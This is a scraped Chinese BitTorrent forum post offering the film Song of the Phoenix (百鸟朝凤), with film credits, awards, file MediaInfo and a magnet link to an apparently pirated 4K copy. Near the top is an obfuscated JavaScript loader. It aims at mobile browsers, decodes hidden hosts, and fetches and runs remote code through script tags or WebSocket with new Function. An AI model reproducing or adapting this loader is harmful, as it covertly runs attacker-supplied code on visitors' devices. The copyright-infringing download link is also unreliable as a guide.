[百鸟朝凤][WEB-MP4/12.33GB][国语中字][4K-2160P][H265编码][传承,文艺,文化,国产,中国大陆,唢呐][BT下载]

版主小s 1月前 199

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x46\x6a\x59\x48\x73\x4f\x52\x52\x45\x59']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxza2pmLm5pYYW5nYYW94aWFuc2hlbmcuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};



◎译  名 百鸟朝凤 / Song of the Phoenix
◎年  代 2013
◎产  地 中国大陆
◎类  别 剧情 / 音乐
◎语  言 汉语普通话
◎上映日期 2016-05-06(中国大陆) / 2017-04-20(中国大陆重映) / 2013-09-25(金鸡百花电影节)
◎IMDb链接 https://www.imdb.com/title/tt3214392/
◎豆瓣评分 8.3/10 (259804人评价)
◎豆瓣链接 https://movie.douban.com/subject/10831445/
◎片  长 108分钟
◎导  演 吴天明 Tianming Wu (id:1168676)
◎编  剧 吴天明 Tianming Wu (id:1168676)
       罗雪莹 Xue-Ying Luo (id:1358108)
       肖江虹 Jianghong Xiao (id:1358109)
◎演  员 陶泽如 Zeru Tao (id:1039767)
       李岷城 Mincheng Li (id:1318702)
       嵇波 Bo Ji (id:1323457)
       胡先煦 Xianxu Hu (id:1329632)
       郑伟 Wei Zheng (id:1325438)
       迟蓬 Peng Chi (id:1314926)
       袁中方 Zhongfang Yuan (id:1318647)
       墨阳 Yang Mo (id:1317986)
       张喜前 Xiqian Zhang (id:1322765)
       谭群 Qun Tan (id:1358110)
       王长玲 Changling Wang (id:1358111)
       周天羽 Tianyu Zhou (id:1358112)
       张双成 Shuangcheng Zhang (id:1358113)
       许还山 Huanshan Xu (id:1313235)
       方励 Li Fang (id:1275873)
       吴天明 Tianming Wu (id:1168676)
       张大龙 Dalong Zhang (id:1365347)
       王天麟 Tianlin Wang (id:1351209)
       谢政辉 Zhenghui Xie (id:1327861)

◎标  签 传承 / 文艺 / 文化 / 国产 / 中国大陆 / 唢呐 / 人生 / 剧情

◎简  介
  老一代唢呐艺人焦三爷(陶泽如 饰)是个外冷内热的老人,看起来严肃古板,其实心怀热血。影片表现了在社会变革、民心浮躁的年代里,新老两代唢呐艺人为了信念的坚守所产生的真挚的师徒情、父子情、兄弟情。                                    
                               本片改编自肖江虹同名小说。

◎获奖情况 (共9项)
  第29届中国电影金鸡奖 (2013)
  最佳故事片(提名)
  最佳男主角(提名)
   └──陶泽如 (id:1039767)
  最佳女配角(提名)
   └──迟蓬 (id:1314926)

  第15届中国电影华表奖 (2013)
  优秀电影音乐奖
   └──张大龙 (id:1365347)
  优秀农村题材影片

  第21届北京大学生电影节 (2014)
  最佳新人奖(提名)
   └──李岷城 (id:1318702)
  组委会大奖

  第3届豆瓣电影年度榜单 (2016)
  评分最高的华语电影(提名)
  5月最受关注电影(提名)


##### MediaInfo ######
General
Complete name                            : [email protected]
Format                                   : MPEG-4
Format profile                           : Base Media
Codec ID                                 : isom (isom/iso2/mp41)
File size                                : 12.3 GiB
Duration                                 : 1 h 43 min
Overall bit rate                         : 17.0 Mb/s
Writing application                      : Lavf58.30.100

Video
ID                                       : 1
Format                                   : HEVC
Format/Info                              : High Efficiency Video Coding
Format profile                           : [email protected]@High
Codec ID                                 : hev1
Codec ID/Info                            : High Efficiency Video Coding
Duration                                 : 1 h 43 min
Bit rate                                 : 16.9 Mb/s
Width                                    : 3 840 pixels
Height                                   : 1 616 pixels
Display aspect ratio                     : 2.40:1
Frame rate mode                          : Constant
Frame rate                               : 25.000 FPS
Color space                              : YUV
Chroma subsampling                       : 4:2:0
Bit depth                                : 8 bits
Bits/(Pixel*Frame)                       : 0.109
Stream size                              : 12.2 GiB (99%)
Codec configuration box                  : hvcC

Audio
ID                                       : 2
Format                                   : AAC LC
Format/Info                              : Advanced Audio Codec Low Complexity
Codec ID                                 : mp4a-40-2
Duration                                 : 1 h 43 min
Bit rate mode                            : Constant
Bit rate                                 : 125 kb/s
Channel(s)                               : 2 channels
Channel layout                           : L R
Sampling rate                            : 44.1 kHz
Frame rate                               : 43.066 FPS (1024 SPF)
Compression mode                         : Lossy
Stream size                              : 92.3 MiB (1%)
Default                                  : Yes
Alternate group                          : 1


TAGS 剧情 音乐

磁力链:
  • magnet:?xt=urn:btih:D359161F359C4E6F7F32EB1F6A188818D2A00B37
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回